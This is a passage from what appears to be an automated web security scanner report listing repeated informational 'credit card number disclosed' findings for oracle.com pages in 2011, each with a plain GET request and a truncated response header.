<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.89. http://www.oracle.com/us/industries/engineering-and-construction/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/engineering-and-construction/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/engineering-and-construction/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41185062445493518,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.90. http://www.oracle.com/us/industries/financial-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/financial-services/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41122746764032528,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.91. http://www.oracle.com/us/industries/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=35659771701213200,0:1)
Date: Tue, 06 Sep 2011 16:16:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.92. http://www.oracle.com/us/industries/retail/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/retail/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41103114469486884,0:1)
Date: Tue, 06 Sep 2011 16:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.93. http://www.oracle.com/us/partnerships/solutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/partnerships/solutions/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=7;ecid=35762992651810657,0:1)
Date: Tue, 06 Sep 2011 16:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 682670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.94. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/partnerships/specialized-showcase-224514.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/partnerships/specialized-showcase-224514.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41185719575500176,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.95. http://www.oracle.com/us/products/applications/fusion/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/fusion/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/applications/fusion/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166757294830496,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.96. http://www.oracle.com/us/products/applications/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/applications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=158;ecid=35949802253392290,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.97. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/jd-edwards-enterpriseone/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/applications/jd-edwards-enterpriseone/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36009141522462811,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.98. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/peoplesoft-enterprise/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/applications/peoplesoft-enterprise/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41122111109101137,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.99. http://www.oracle.com/us/products/applications/primavera/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/primavera/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166877553917005,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.100. http://www.oracle.com/us/products/consulting/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/consulting/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/consulting/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168123094454758,0:1)
Date: Tue, 06 Sep 2011 16:16:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.101. http://www.oracle.com/us/products/database/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/database/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/database/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41104377188862589,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.102. http://www.oracle.com/us/products/enterprise-manager/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/enterprise-manager/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/enterprise-manager/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41182210587165352,0:1)
Date: Tue, 06 Sep 2011 16:16:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.103. http://www.oracle.com/us/products/financing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/financing/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/financing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36010644761040741,0:1)
Date: Tue, 06 Sep 2011 16:16:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.104. http://www.oracle.com/us/products/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=206;ecid=41100185301745926,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.105. http://www.oracle.com/us/products/middleware/exalogic/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/middleware/exalogic/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/middleware/exalogic/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41167156726795434,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.106. http://www.oracle.com/us/products/middleware/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/middleware/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/middleware/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41182305076447159,0:1)
Date: Tue, 06 Sep 2011 16:16:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 159756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.107. http://www.oracle.com/us/products/ondemand/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/ondemand/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/ondemand/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100704992796393,0:1)
Date: Tue, 06 Sep 2011 16:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.108. http://www.oracle.com/us/products/productslist/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/productslist/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/productslist/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=11;ecid=41167500324184736,0:1)
Date: Tue, 06 Sep 2011 16:16:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 306727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.109. http://www.oracle.com/us/products/servers-storage/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/servers-storage/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/servers-storage/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=8;ecid=35997313182343520,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.110. http://www.oracle.com/us/products/servers-storage/solaris/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/servers-storage/solaris/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/servers-storage/solaris/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36009571019199159,0:1)
Date: Tue, 06 Sep 2011 16:16:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.111. http://www.oracle.com/us/products/tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/tools/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/products/tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100606208547255,0:1)
Date: Tue, 06 Sep 2011 16:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 151414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.112. http://www.oracle.com/us/social-media/facebook/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/facebook/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/social-media/facebook/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41101572576206911,0:1)
Date: Tue, 06 Sep 2011 16:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.113. http://www.oracle.com/us/social-media/linkedin/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/linkedin/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/social-media/linkedin/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168475281778550,0:1)
Date: Tue, 06 Sep 2011 16:16:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.114. http://www.oracle.com/us/social-media/twitter/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/social-media/twitter/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/social-media/twitter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168393677398942,0:1)
